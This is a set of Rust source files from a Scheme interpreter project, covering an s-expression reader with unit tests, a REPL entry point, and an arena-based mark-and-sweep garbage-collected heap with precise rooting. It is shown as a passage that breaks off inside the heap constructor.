fn read_character(&mut self, loc: Location) -> Option<SchemeResultAndLocation> { match [self.next_char(), self.peek_char()] { // Normal character, e.g. `#\f`. [Some(c), d] if is_eof_or_delimiter(&d) => { self.root(loc, Value::new_character(c)) }, // Newline character: `#\newline`. [Some('n'), Some('e')] => match [self.next_char(), self.next_char(), self.next_char(), self.next_char(), self.next_char(), self.next_char(), self.peek_char()] { [Some('e'), Some('w'), Some('l'), Some('i'), Some('n'), Some('e'), d] if is_eof_or_delimiter(&d) => { self.root(loc, Value::new_character('\n')) }, _ => self.bad_character_literal(), }, // Space character: `#\space`. [Some('s'), Some('p')] => match [self.next_char(), self.next_char(), self.next_char(), self.next_char(), self.peek_char()] { [Some('p'), Some('a'), Some('c'), Some('e'), d] if is_eof_or_delimiter(&d) => { self.root(loc, Value::new_character(' ')) }, _ => self.bad_character_literal(), }, // Tab character: `#\tab`. [Some('t'), Some('a')] => match [self.next_char(), self.next_char(), self.peek_char()] { [Some('a'), Some('b'), d] if is_eof_or_delimiter(&d) => { self.root(loc, Value::new_character('\t')) }, _ => self.bad_character_literal(), }, _ => self.bad_character_literal(), } } /// Given that we have already peeked a '#' character, read in either a /// boolean or a character. fn read_bool_or_char(&mut self, loc: Location) -> Option<SchemeResultAndLocation> { if let Some(e) = self.expect_character('#') { return Some(e); } // Deterimine if this is a boolean or a character. match [self.next_char(), self.peek_char()] { [Some('t'), d] if is_eof_or_delimiter(&d) => { self.root(loc, Value::new_boolean(true)) }, [Some('f'), d] if is_eof_or_delimiter(&d) => { self.root(loc, Value::new_boolean(false)) }, [Some('\\'), _] => { self.read_character(loc) }, [Some(c), _] => { self.unexpected_character(&c) }, _ => None, } } /// Read an integer. 
fn read_integer(&mut self, is_negative: bool, loc: Location) -> Option<SchemeResultAndLocation> { let sign : i64 = if is_negative { -1 } else { 1 }; let mut abs_value : i64 = match self.next_char() { None => return self.unexpected_eof(), Some(c) => match c.to_digit(10) { None => return self.unexpected_character(&c), Some(d) => d as i64 } }; loop { match self.peek_char() { None => break, Some(c) if is_delimiter(&c) => break, Some(c) => match c.to_digit(10) { None => return self.unexpected_character(&c), Some(d) => abs_value = (abs_value * 10) + (d as i64), } } self.next_char(); } self.root(loc, Value::new_integer(abs_value * sign)) } /// Read a pair, with the leading '(' already taken from the input. fn read_pair(&mut self, loc: Location) -> Option<SchemeResultAndLocation> { self.trim(); match self.peek_char() { None => return self.unexpected_eof(), Some(')') => { self.next_char(); return self.root(loc, Value::EmptyList); }, _ => { let car = match self.next() { Some((_, Ok(v))) => v, err => return err, }; self.trim(); let next_loc = self.current_location.clone(); match self.peek_char() { None => return self.unexpected_eof(), // Improper list. Some('.') => { self.next_char(); let cdr = match self.next() { Some((_, Ok(v))) => v, err => return err, }; self.trim(); if let Some(e) = self.expect_character(')') { return Some(e); } return self.enlocate(loc, Value::new_pair(self.heap(), &car, &cdr)); }, // Proper list. _ => { let cdr = match self.read_pair(next_loc) { Some((_, Ok(v))) => v, err => return err, }; return self.enlocate(loc, Value::new_pair(self.heap(), &car, &cdr)); }, }; }, }; } /// Read a string in from the input. 
fn read_string(&mut self, loc: Location) -> Option<SchemeResultAndLocation> { if let Some(e) = self.expect_character('"') { return Some(e); } let mut str = String::new(); loop { match self.next_char() { None => return self.unterminated_string(), Some('"') => return self.enlocate(loc, Value::new_string(self.heap(), str)), Some('\\') => { match self.next_char() { Some('n') => str.push('\n'), Some('t') => str.push('\t'), Some('\\') => str.push('\\'), Some('"') => str.push('"'), Some(c) => return self.unexpected_character(&c), None => return self.unterminated_string(), } }, Some(c) => str.push(c), } } } /// Read a symbol in from the input. Optionally supply a prefix character /// that was already read from the symbol. fn read_symbol(&mut self, prefix: Option<char>, loc: Location) -> Option<SchemeResultAndLocation> { let mut str = String::new(); if prefix.is_some() { str.push(prefix.unwrap()); } else { match self.next_char() { Some(c) if is_symbol_initial(&c) => str.push(c), Some(c) => { return self.unexpected_character(&c); }, None => { return self.unexpected_eof(); }, }; } loop { match self.peek_char() { Some(c) if is_symbol_subsequent(&c) => { self.next_char(); str.push(c) }, _ => break, }; } return self.enlocate(loc, self.heap().get_or_create_symbol(str)); } /// Read a quoted form from input, e.g. `'(1 2 3)`. 
fn read_quoted(&mut self, loc: Location) -> Option<SchemeResultAndLocation> { if let Some(e) = self.expect_character('\'') { return Some(e); } return match self.next() { Some((_, Ok(val))) => self.enlocate(loc, list(self.heap(), &mut [ self.heap().get_or_create_symbol("quote".to_string()), val ])), err => err }; } } impl<R: Reader> Iterator for Read<R> { type Item = SchemeResultAndLocation; fn next(&mut self) -> Option<SchemeResultAndLocation> { if self.had_error { return None; } self.trim(); let location = self.current_location.clone(); match self.peek_char() { None => None, Some('\'') => self.read_quoted(location), Some('-') => { self.next_char(); match self.peek_char() { Some(c) if c.is_digit(10) => { self.read_integer(true, location) }, _ => self.read_symbol(Some('-'), location), } }, Some(c) if c.is_digit(10) => self.read_integer(false, location), Some('#') => self.read_bool_or_char(location), Some('"') => self.read_string(location), Some('(') => { self.next_char(); self.read_pair(location) }, Some(c) if is_symbol_initial(&c) => self.read_symbol(None, location), Some(c) => self.unexpected_character(&c), } } } /// Create a `Read` instance from a byte vector. pub fn read_from_bytes(bytes: Vec<u8>, heap: *mut Heap, file_name: &str) -> Read<MemReader> { Read::new(MemReader::new(bytes), heap, file_name.to_string()) } /// Create a `Read` instance from a `String`. pub fn read_from_string(string: String, heap: *mut Heap, file_name: &str) -> Read<MemReader> { read_from_bytes(string.into_bytes(), heap, file_name) } /// Create a `Read` instance from a `&str`. pub fn read_from_str(str: &str, heap: *mut Heap, file_name: &str) -> Read<MemReader> { read_from_string(str.to_string(), heap, file_name) } /// Create a `Read` instance from the file at `path_name`. 
pub fn read_from_file(path_name: &str, heap: *mut Heap) -> IoResult<Read<File>> { let file_name = path_name.clone().to_string(); let path = Path::new(path_name); let file = try!(File::open(&path)); Ok(Read::new(file, heap, file_name)) } // TESTS ----------------------------------------------------------------------- #[cfg(test)] mod tests { use super::*; use heap::{Heap, Rooted}; use value::{Value}; #[test] fn test_read_integers() { let input = "5 -5 789 -987"; let mut heap = Heap::new(); let results : Vec<Value> = read_from_str(input, &mut heap, "test_read_integers") .map(|(_, r)| *r.ok().expect("Should not get a read error")) .collect(); assert_eq!(results, vec!(Value::new_integer(5), Value::new_integer(-5), Value::new_integer(789), Value::new_integer(-987))) } #[test] fn test_read_booleans() { let input = "#t #f"; let mut heap = Heap::new(); let results : Vec<Value> = read_from_str(input, &mut heap, "test_read_booleans") .map(|(_, r)| *r.ok().expect("Should not get a read error")) .collect(); assert_eq!(results, vec!(Value::new_boolean(true), Value::new_boolean(false))) } #[test] fn test_read_characters() { let input = "#\\a #\\0 #\\- #\\space #\\tab #\\newline #\\\n"; let mut heap = Heap::new(); let results : Vec<Value> = read_from_str(input, &mut heap, "test_read_characters") .map(|(_, r)| *r.ok().expect("Should not get a read error")) .collect(); assert_eq!(results, vec!(Value::new_character('a'), Value::new_character('0'), Value::new_character('-'), Value::new_character(' '), Value::new_character('\t'), Value::new_character('\n'), Value::new_character('\n'))); } #[test] fn test_read_comments() { let input = "1 ;; this is a comment\n2"; let mut heap = Heap::new(); let results : Vec<Value> = read_from_str(input, &mut heap, "test_read_comments") .map(|(_, r)| *r.ok().expect("Should not get a read error")) .collect(); assert_eq!(results.len(), 2); assert_eq!(results, vec!(Value::new_integer(1), Value::new_integer(2))); } #[test] fn test_read_pairs() { let input 
= "() (1 2 3) (1 (2) ((3)))"; let heap = &mut Heap::new(); let results : Vec<Value> = read_from_str(input, heap, "test_read_pairs") .map(|(_, r)| *r.ok().expect("Should not get a read error")) .collect(); assert_eq!(results.len(), 3); assert_eq!(results[0], Value::EmptyList); let v1 = &results[1]; assert_eq!(v1.car(heap).expect("v1.car"), Rooted::new(heap, Value::new_integer(1))); assert_eq!(v1.cdr(heap).expect("v1.cdr") .car(heap).expect("v1.cdr.car"), Rooted::new(heap, Value::new_integer(2))); assert_eq!(v1.cdr(heap).expect("v1.cdr") .cdr(heap).expect("v1.cdr.cdr") .car(heap).expect("v1.cdr.cdr.car"), Rooted::new(heap, Value::new_integer(3))); assert_eq!(v1.cdr(heap).expect("v1.cdr") .cdr(heap).expect("v1.cdr.cdr") .cdr(heap).expect("v1.cdr.cdr.cdr"), Rooted::new(heap, Value::EmptyList)); let v2 = &results[2]; assert_eq!(v2.car(heap).expect("v2.car"), Rooted::new(heap, Value::new_integer(1))); assert_eq!(v2.cdr(heap).expect("v2.cdr") .car(heap).expect("v2.cdr.car") .car(heap).expect("v2.cdr.car.car"), Rooted::new(heap, Value::new_integer(2))); assert_eq!(v2.cdr(heap).expect("v2.cdr") .car(heap).expect("v2.cdr.car") .cdr(heap).expect("v2.cdr.car.cdr"), Rooted::new(heap, Value::EmptyList)); assert_eq!(v2.cdr(heap).expect("v2.cdr") .cdr(heap).expect("v2.cdr.cdr") .car(heap).expect("v2.cdr.cdr.car") .car(heap).expect("v2.cdr.cdr.car.car") .car(heap).expect("v2.cdr.cdr.car.car.car"), Rooted::new(heap, Value::new_integer(3))); assert_eq!(v2.cdr(heap).expect("v2.cdr") .cdr(heap).expect("v2.cdr.cdr") .car(heap).expect("v2.cdr.cdr.car") .car(heap).expect("v2.cdr.cdr.car.car") .cdr(heap).expect("v2.cdr.cdr.car.car.cdr"), Rooted::new(heap, Value::EmptyList)); assert_eq!(v2.cdr(heap).expect("v2.cdr") .cdr(heap).expect("v2.cdr.cdr") .car(heap).expect("v2.cdr.cdr.car") .cdr(heap).expect("v2.cdr.cdr.car.cdr"), Rooted::new(heap, Value::EmptyList)); assert_eq!(v2.cdr(heap).expect("v2.cdr") .cdr(heap).expect("v2.cdr.cdr") .cdr(heap).expect("v2.cdr.cdr.cdr"), Rooted::new(heap, 
Value::EmptyList)); } #[test] fn test_read_improper_lists() { let input = "(1 . 2) (3 . ()) (4 . (5 . 6)) (1 2 . 3)"; let heap = &mut Heap::new(); let results : Vec<Value> = read_from_str(input, heap, "test_read_improper_lists") .map(|(_, r)| *r.ok().expect("Should not get a read error")) .collect(); assert_eq!(results.len(), 4); let v0 = &results[0]; assert_eq!(v0.car(heap), Some(Rooted::new(heap, Value::new_integer(1)))); assert_eq!(v0.cdr(heap), Some(Rooted::new(heap, Value::new_integer(2)))); let v1 = &results[1]; assert_eq!(v1.car(heap), Some(Rooted::new(heap, Value::new_integer(3)))); assert_eq!(v1.cdr(heap), Some(Rooted::new(heap, Value::EmptyList))); let v2 = &results[2]; assert_eq!(v2.car(heap), Some(Rooted::new(heap, Value::new_integer(4)))); assert_eq!(v2.cdr(heap).expect("v2.cdr") .car(heap), Some(Rooted::new(heap, Value::new_integer(5)))); assert_eq!(v2.cdr(heap).expect("v2.cdr") .cdr(heap), Some(Rooted::new(heap, Value::new_integer(6)))); let v3 = &results[3]; assert_eq!(v3.car(heap), Some(Rooted::new(heap, Value::new_integer(1)))); assert_eq!(v3.cdr(heap).expect("v3.cdr") .car(heap), Some(Rooted::new(heap, Value::new_integer(2)))); assert_eq!(v3.cdr(heap).expect("v3.cdr") .cdr(heap), Some(Rooted::new(heap, Value::new_integer(3)))); } #[test] fn test_read_string() { let input = "\"\" \"hello\" \"\\\"\""; let heap = &mut Heap::new(); let results : Vec<Value> = read_from_str(input, heap, "test_read_string") .map(|(_, r)| *r.ok().expect("Should not get a read error")) .collect(); assert_eq!(results.len(), 3); match results[0] { Value::String(str) => assert_eq!(*str, "".to_string()), _ => assert!(false), } match results[1] { Value::String(str) => assert_eq!(*str, "hello".to_string()), _ => assert!(false), } match results[2] { Value::String(str) => assert_eq!(*str, "\"".to_string()), _ => assert!(false), } } #[test] fn test_read_symbols() { let input = "foo + - * ? 
!"; let heap = &mut Heap::new(); let results : Vec<Value> = read_from_str(input, heap, "test_read_symbols") .map(|(_, r)| *r.ok().expect("Should not get a read error")) .collect(); assert_eq!(results.len(), 6); match results[0] { Value::Symbol(str) => assert_eq!(*str, "foo".to_string()), _ => assert!(false), } match results[1] { Value::Symbol(str) => assert_eq!(*str, "+".to_string()), _ => assert!(false), } match results[2] { Value::Symbol(str) => assert_eq!(*str, "-".to_string()), _ => assert!(false), } match results[3] { Value::Symbol(str) => assert_eq!(*str, "*".to_string()), _ => assert!(false), } match results[4] { Value::Symbol(str) => assert_eq!(*str, "?".to_string()), _ => assert!(false), } match results[5] { Value::Symbol(str) => assert_eq!(*str, "!".to_string()), _ => assert!(false), } } #[test] fn test_read_same_symbol() { let input = "foo foo"; let heap = &mut Heap::new(); let results : Vec<Value> = read_from_str(input, heap, "test_read_same_symbol") .map(|(_, r)| *r.ok().expect("Should not get a read error")) .collect(); assert_eq!(results.len(), 2); // We should only allocate one StringPtr and share it between both parses of // the same symbol. 
assert_eq!(results[0], results[1]); } #[test] fn test_read_quoted() { let input = "'foo"; let heap = &mut Heap::new(); let results : Vec<Value> = read_from_str(input, heap, "test_read_quoted") .map(|(_, r)| *r.ok().expect("Should not get a read error")) .collect(); assert_eq!(results.len(), 1); let car = results[0].car(heap).map(|s| *s); match car { Some(Value::Symbol(str)) => assert_eq!(*str, "quote".to_string()), _ => assert!(false), } let cdar = results[0] .cdr(heap).expect("results[0].cdr") .car(heap).map(|s| *s); match cdar { Some(Value::Symbol(str)) => assert_eq!(*str, "foo".to_string()), _ => assert!(false), } } #[test] fn test_read_from_file() { let heap = &mut Heap::new(); let reader = read_from_file("./tests/test_read_from_file.scm", heap) .ok() .expect("Should be able to read from a file"); let results : Vec<Value> = reader .map(|(_, r)| *r.ok().expect("Should not get a read error")) .collect(); assert_eq!(results.len(), 1); assert_eq!(**results[0].to_symbol(heap).expect("Should be a symbol"), "hello".to_string()); } #[test] fn test_read_locations() { // 1 2 // 12345678901234567890 let input = " -1 'quoted \n\ (on a new line) twice"; let heap = &mut Heap::new(); let results : Vec<Location> = read_from_str(input, heap, "test_read_locations") .map(|(loc, _)| loc) .collect(); assert_eq!(results.len(), 4); let file_str = "test_read_locations".to_string(); assert_eq!(results[0].file, file_str); assert_eq!(results[0].line, 1); assert_eq!(results[0].column, 5);
rust
Apache-2.0
fdcf1e9d688aaa02a2ee9c647774f74c7ea08005
2026-01-04T20:20:58.006505Z
true
fitzgen/oxischeme
https://github.com/fitzgen/oxischeme/blob/fdcf1e9d688aaa02a2ee9c647774f74c7ea08005/src/main.rs
src/main.rs
// Copyright 2014 Nick Fitzgerald // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. // See the License for the specific language governing permissions and // limitations under the License. //! A Scheme implementation, in Rust. #![feature(collections)] #![feature(core)] #![feature(env)] #![feature(old_io)] #![feature(old_path)] #![feature(test)] #![feature(unicode)] #![feature(unsafe_destructor)] use std::old_io; use std::env; pub mod environment; pub mod eval; pub mod heap; pub mod primitives; pub mod read; pub mod value; /// Start a Read -> Evaluate -> Print loop. pub fn repl(heap: &mut heap::Heap) { println!("Welcome to oxischeme!"); println!("C-c to exit."); println!(""); loop { let stdin = old_io::stdio::stdin(); let reader = read::Read::new(stdin, heap, "stdin".to_string()); print!("oxischeme> "); for (location, read_result) in reader { match read_result { Err(msg) => { println!("{}", msg); break; }, Ok(form) => { match eval::evaluate(heap, &form, location) { Ok(val) => println!("{}", *val), Err(e) => println!("{}", e), }; } } heap.collect_garbage(); print!("oxischeme> "); } } } /// Given no arguments, start the REPL. Otherwise, treat each argument as a file /// path and read and evaluate each of them in turn. 
pub fn main() { let heap = &mut heap::Heap::new(); let mut args_were_passed = false; for file_path in env::args().skip(1) { args_were_passed = true; match eval::evaluate_file(heap, file_path.as_slice()) { Ok(_) => { }, Err(msg) => { let mut stderr = old_io::stdio::stderr(); (write!(&mut stderr, "{}", msg)).ok().expect("IO ERROR!"); return; } } } if !args_were_passed { repl(heap); } }
rust
Apache-2.0
fdcf1e9d688aaa02a2ee9c647774f74c7ea08005
2026-01-04T20:20:58.006505Z
false
fitzgen/oxischeme
https://github.com/fitzgen/oxischeme/blob/fdcf1e9d688aaa02a2ee9c647774f74c7ea08005/src/heap.rs
src/heap.rs
// Copyright 2014 Nick Fitzgerald // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. // See the License for the specific language governing permissions and // limitations under the License. //! The `heap` module provides memory management for our Scheme implementation. //! //! ## Allocation //! //! Scheme has a variety of types that must be allocated on the heap: cons cells, //! strings, procedures, and vectors (currently unimplemented). //! //! Oxischeme does not allocate each individual object directly from the OS, //! which would have unnecessary bookkeeping overhead. Instead, we allocate //! objects from an "arena" which contains a pre-allocated object pool reserved //! for allocating future objects from. We keep track of an arena's un-used //! objects with a "free list" of indices into this pool. When we allocate a new //! object, we remove the first entry from this list and return a pointer to the //! object at that entry's index in the object pool. Garbage collection adds new //! entries to the free list when reclaiming dead objects. When allocating, if //! our existing arenas' pools are already at capacity (ie, all of their free //! lists are empty), then we allocate another arena from the OS, add it to our //! set of arenas, and allocate from its object pool. During garbage collection, //! if an arena is empty, its memory is returned to the OS. //! //! ## Garbage Collection //! //! Any type that is heap-allocated must be *garbage collected* so that the //! memory of no-longer used instances of that type can be reclaimed for //! reuse. 
This provides the illusion of infinite memory, and frees Scheme //! programmers from manually managing allocations and frees. We refer to //! GC-managed types as "GC things". Note that a GC thing does not need to be a //! Scheme value type: activations are also managed by the GC, but are not a //! first class Scheme value. //! //! Any structure that has references to a garbage collected type must //! *participate in garbage collection* by telling the garbage collector about //! all of the GC things it is holding alive. Participation is implemented via //! the `Trace` trait. Note that the set of types that participate in garbage //! collection is not the same as the set of all GC things. Some GC things do not //! participate in garbage collection: strings do not hold references to any //! other GC things. //! //! A "GC root" is a GC participant that is always reachable. For example, the //! global activation is a root because global variables must always be //! accessible. //! //! We use a simple *mark and sweep* garbage collection algorithm. In the mark //! phase, we start from the roots and recursively trace every reachable object //! in the heap graph, adding them to our "marked" set. If a GC thing is not //! reachable, then it is impossible for the Scheme program to use it in the //! future, and it is safe for the garbage collector to reclaim it. The //! unreachable objects are the set of GC things that are not in the marked //! set. We find these unreachable objects and return them to their respective //! arena's free list in the sweep phase. //! //! ### Rooting //! //! Sometimes it is necessary to temporarily root GC things referenced by //! pointers on the stack. Garbage collection can be triggered by allocating any //! GC thing, and it isn't always clear which rust functions (or other functions //! called by those functions, or even other functions called by those functions //! called from the first function, and so on) might allocate a GC thing and //! 
trigger collection. The situation we want to avoid is a rust function using a //! temporary variable that references a GC thing, then calling another function //! which triggers a collection and collects the GC thing that was referred to by //! the temporary variable, and the temporary variable is now a dangling //! pointer. If the rust function accesses it again, that is undefined behavior: //! it might still get the value it was pointing at, or it might be a segfault, //! or it might be a freshly allocated value used by something else! Not good! //! //! Here is what this scenario looks like in psuedo code: //! //! let a = pointer_to_some_gc_thing; //! function_which_can_trigger_gc(); //! // Oops! A collection was triggered and dereferencing this pointer leads //! // to undefined behavior! //! *a; //! //! There are two possible solutions to this problem. The first is *conservative* //! garbage collection, where we walk the stack and if anything on the stack //! looks like it might be a pointer and if coerced to a pointer happens to point //! to a GC thing in the heap, we assume that it *is* a pointer and we consider //! the GC thing that may or may not actually be pointed to by a variable on the //! stack a GC root. The second is *precise rooting*. With precise rooting, it is //! the responsibility of the rust function's author to explicitly root and //! unroot pointers to GC things used in variables on the stack. //! //! Oxischeme uses precise rooting. Precise rooting is implemented with the //! `Rooted<GcThingPtr>` smart pointer type, which roots its referent upon //! construction and unroots it when the smart pointer goes out of scope and is //! dropped. //! //! Using precise rooting and `Rooted`, we can solve the dangling pointer //! problem like this: //! //! { //! // The pointed to GC thing gets rooted when wrapped with `Rooted`. //! let a = Rooted::new(heap, pointer_to_some_gc_thing); //! function_which_can_trigger_gc(); //! 
// Dereferencing `a` is now safe, because the referent is a GC root! //! *a; //! } //! // `a` goes out of scope, and its referent is unrooted. //! //! Tips for working with precise rooting if your function allocates GC things, //! or calls other functions which allocate GC things: //! //! * Accept GC thing parameters as `&Rooted<T>` or `&mut Rooted<T>` to ensure //! that callers properly root them. //! //! * Accept a `&mut Heap` parameter and return `Rooted<T>` for getters and //! methods that return GC things. This greatly alleviates potential //! foot-guns, as a caller would have to explicitly unwrap the smart pointer //! and store that in a new variable to cause a dangling pointer. It also //! cuts down on `Rooted<T>` construction boiler plate. //! //! * Always root GC things whose lifetime spans a call which could trigger a //! collection! //! //! * When in doubt, Just Root It! use std::cmp; use std::collections::{BitVec, HashMap}; use std::default::{Default}; use std::fmt; use std::ops::{Deref, DerefMut}; use std::vec::{IntoIter}; use environment::{Activation, ActivationPtr, RootedActivationPtr, Environment}; use primitives::{define_primitives}; use read::{Location}; use value::{Cons, ConsPtr, Procedure, ProcedurePtr, RootedConsPtr, RootedProcedurePtr, RootedValue, Value}; /// We use a vector for our implementation of a free list. `Vector::push` to add /// new entries, `Vector::pop` to remove the next entry when we allocate. type FreeList = Vec<usize>; /// An arena from which to allocate `T` objects from. pub struct Arena<T> { pool: Vec<T>, /// The set of free indices into `pool` that are available for allocating an /// object from. free: FreeList, /// During a GC, if the nth bit of `marked` is set, that means that the nth /// object in `pool` has been marked as reachable. marked: BitVec, } impl<T: Default> Arena<T> { /// Create a new `Arena` with the capacity to allocate the given number of /// `T` instances. 
pub fn new(capacity: usize) -> Box<Arena<T>> { assert!(capacity > 0); Box::new(Arena { pool: range(0, capacity).map(|_| Default::default()).collect(), free: range(0, capacity).collect(), marked: BitVec::from_elem(capacity, false), }) } /// Get this heap's capacity for simultaneously allocated cons cells. pub fn capacity(&self) -> usize { self.pool.len() } /// Return true if this arena is at full capacity, and false otherwise. pub fn is_full(&self) -> bool { self.free.is_empty() } /// Return true if this arena does not contain any reachable objects (ie, /// the free list is full), and false otherwise. pub fn is_empty(&self) -> bool { self.free.len() == self.capacity() } /// Allocate a new `T` instance and return a pointer to it. /// /// ## Panics /// /// Panics when this arena's pool is already at capacity. pub fn allocate(&mut self) -> ArenaPtr<T> { match self.free.pop() { Some(idx) => { let self_ptr : *mut Arena<T> = self; ArenaPtr::new(self_ptr, idx) }, None => panic!("Arena is at capacity!"), } } /// Sweep the arena and add any reclaimed objects back to the free list. pub fn sweep(&mut self) { self.free = range(0, self.capacity()) .filter(|&n| { !self.marked.get(n) .expect("`marked` should always have length == self.capacity()") }) .collect(); // Reset `marked` to all zero. self.marked.set_all(); self.marked.negate(); } } /// A set of `Arena`s. Manages allocating and deallocating additional `Arena`s /// from the OS, depending on the number of objects requested and kept alive by /// the mutator. pub struct ArenaSet<T> { capacity: usize, arenas: Vec<Box<Arena<T>>>, } impl<T: Default> ArenaSet<T> { /// Create a new `ArenaSet`. pub fn new(capacity: usize) -> ArenaSet<T> { ArenaSet { capacity: capacity, arenas: vec!() } } /// Sweep all of the arenas in this set. pub fn sweep(&mut self) { for arena in self.arenas.iter_mut() { arena.sweep(); } // Deallocate any arenas that do not contain any reachable objects. 
self.arenas.retain(|a| !a.is_empty()); } /// Allocate a `T` object from one of the arenas in this set and return a /// pointer to it. pub fn allocate(&mut self) -> ArenaPtr<T> { for arena in self.arenas.iter_mut() { if !arena.is_full() { return arena.allocate(); } } // All existing arenas are at capacity, allocate a new one for this // requested object allocation, get the requested object from it, and add it to our // set. let mut new_arena = Arena::new(self.capacity); let result = new_arena.allocate(); self.arenas.push(new_arena); result } } /// A pointer to a `T` instance in an arena. #[allow(raw_pointer_derive)] #[derive(Hash)] pub struct ArenaPtr<T> { arena: *mut Arena<T>, index: usize, } // XXX: We have to manually declare that ArenaPtr<T> is copy-able because if we // use `#[derive(Copy)]` it wants T to be copy-able as well, despite the fact // that we only need to copy our pointer to the Arena<T>, not any T or the Arena // itself. impl<T> ::std::marker::Copy for ArenaPtr<T> { } impl<T: Default> ArenaPtr<T> { /// Create a new `ArenaPtr` to the `T` instance at the given index in the /// provided arena. **Not** publicly exposed, and should only be called by /// `Arena::allocate`. fn new(arena: *mut Arena<T>, index: usize) -> ArenaPtr<T> { unsafe { let arena_ref = arena.as_ref() .expect("ArenaPtr<T>::new should be passed a valid Arena."); assert!(index < arena_ref.capacity()); } ArenaPtr { arena: arena, index: index, } } /// During a GC, mark this `ArenaPtr` as reachable. fn mark(&self) { unsafe { let arena = self.arena.as_mut() .expect("An ArenaPtr<T> should always have a valid Arena."); arena.marked.set(self.index, true); } } /// During a GC, determine if this `ArenaPtr` has been marked as reachable. 
fn is_marked(&self) -> bool { unsafe { let arena = self.arena.as_mut() .expect("An ArenaPtr<T> should always have a valid Arena."); return arena.marked.get(self.index) .expect("self.index should always be within the marked bitv's length."); } } } impl<T> Deref for ArenaPtr<T> { type Target = T; fn deref<'a>(&'a self) -> &'a T { unsafe { let arena = self.arena.as_ref() .expect("ArenaPtr::deref should always have an Arena."); &arena.pool[self.index] } } } impl<T> DerefMut for ArenaPtr<T> { fn deref_mut<'a>(&'a mut self) -> &'a mut T { unsafe { let arena = self.arena.as_mut() .expect("ArenaPtr::deref_mut should always have an Arena."); &mut arena.pool[self.index] } } } impl<T> fmt::Debug for ArenaPtr<T> { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { write!(f, "ArenaPtr({:p}, {})", &self.arena, &self.index) } } impl<T> cmp::PartialEq for ArenaPtr<T> { /// Note that `PartialEq` implements pointer object identity, not structural /// comparison. In other words, it is equivalent to the scheme function /// `eq?`, not the scheme function `equal?`. fn eq(&self, other: &ArenaPtr<T>) -> bool { self.index == other.index && (self.arena as usize) == (other.arena as usize) } } impl<T> cmp::Eq for ArenaPtr<T> { } /// A trait for types that can be coerced to a `GcThing`. pub trait ToGcThing: fmt::Debug { /// Coerce this value to a `GcThing`. fn to_gc_thing(&self) -> Option<GcThing>; } /// A smart pointer wrapping the pointer type `T`. It keeps its referent rooted /// while the smart pointer is in scope to prevent dangling pointers caused by a /// garbage collection within the pointers lifespan. For more information see /// the module level documentation about rooting. #[allow(raw_pointer_derive)] #[derive(Hash, Debug)] pub struct Rooted<T> { heap: *mut Heap, ptr: T, } impl<T: ToGcThing> Rooted<T> { /// Create a new `Rooted<T>`, rooting the referent. 
pub fn new(heap: &mut Heap, ptr: T) -> Rooted<T> { let mut r = Rooted { heap: heap, ptr: ptr, }; r.add_root(); r } /// Unroot the current referent and replace it with the given referent, /// which then gets rooted. pub fn emplace(&mut self, rhs: T) { self.drop_root(); self.ptr = rhs; self.add_root(); } /// Add the current referent as a GC root. fn add_root(&mut self) { if let Some(r) = self.ptr.to_gc_thing() { unsafe { self.heap.as_mut() .expect("Rooted<T>::drop should always have a Heap") .add_root(r); } } } /// Unroot the current referent. fn drop_root(&mut self) { unsafe { let heap = self.heap.as_mut() .expect("Rooted<T>::drop should always have a Heap"); heap.drop_root(self); } } } impl<T: ToGcThing> ToGcThing for Rooted<T> { fn to_gc_thing(&self) -> Option<GcThing> { self.ptr.to_gc_thing() } } impl<T> Deref for Rooted<T> { type Target = T; fn deref<'a>(&'a self) -> &'a T { &self.ptr } } impl<T> DerefMut for Rooted<T> { fn deref_mut<'a>(&'a mut self) -> &'a mut T { &mut self.ptr } } #[unsafe_destructor] impl<T: ToGcThing> Drop for Rooted<T> { fn drop(&mut self) { self.drop_root(); } } impl<T: Copy + ToGcThing> Clone for Rooted<T> { fn clone(&self) -> Self { unsafe { let heap = self.heap.as_mut() .expect("Rooted<T>::clone should always have a Heap"); Rooted::new(heap, self.ptr) } } } impl<T: PartialEq> PartialEq for Rooted<T> { fn eq(&self, rhs: &Self) -> bool { **self == **rhs } } impl<T: PartialEq + Eq> Eq for Rooted<T> { } /// A pointer to a string on the heap. pub type StringPtr = ArenaPtr<String>; impl ToGcThing for StringPtr { fn to_gc_thing(&self) -> Option<GcThing> { Some(GcThing::from_string_ptr(*self)) } } /// A rooted pointer to a string on the heap. pub type RootedStringPtr = Rooted<StringPtr>; /// The scheme heap and GC runtime, containing all allocated cons cells, /// activations, procedures, and strings (including strings for symbols). pub struct Heap { /// The static environment. 
pub environment: Environment, cons_cells: ArenaSet<Cons>, strings: ArenaSet<String>, activations: ArenaSet<Activation>, procedures: ArenaSet<Procedure>, roots: Vec<(GcThing, usize)>, symbol_table: HashMap<String, StringPtr>, global_activation: ActivationPtr, allocations: usize, allocations_threshold: usize, locations: HashMap<ConsPtr, Location>, } /// The default capacity of cons cells per arena. pub static DEFAULT_CONS_CAPACITY : usize = 1 << 10; /// The default capacity of strings per arena. pub static DEFAULT_STRINGS_CAPACITY : usize = 1 << 10; /// The default capacity of activations per arena. pub static DEFAULT_ACTIVATIONS_CAPACITY : usize = 1 << 10; /// The default capacity of procedures per arena. pub static DEFAULT_PROCEDURES_CAPACITY : usize = 1 << 10; /// ## `Heap` Constructors impl Heap { /// Create a new `Heap` with the default capacity. pub fn new() -> Heap { Heap::with_arenas(ArenaSet::new(DEFAULT_CONS_CAPACITY), ArenaSet::new(DEFAULT_STRINGS_CAPACITY), ArenaSet::new(DEFAULT_ACTIVATIONS_CAPACITY), ArenaSet::new(DEFAULT_PROCEDURES_CAPACITY)) } /// Create a new `Heap` using the given arenas for allocating cons cells and /// strings within. pub fn with_arenas(cons_cells: ArenaSet<Cons>, strings: ArenaSet<String>, mut acts: ArenaSet<Activation>, procs: ArenaSet<Procedure>) -> Heap { let mut global_act = acts.allocate(); let mut env = Environment::new(); define_primitives(&mut env, &mut global_act); let mut h = Heap { environment: env, cons_cells: cons_cells, strings: strings, 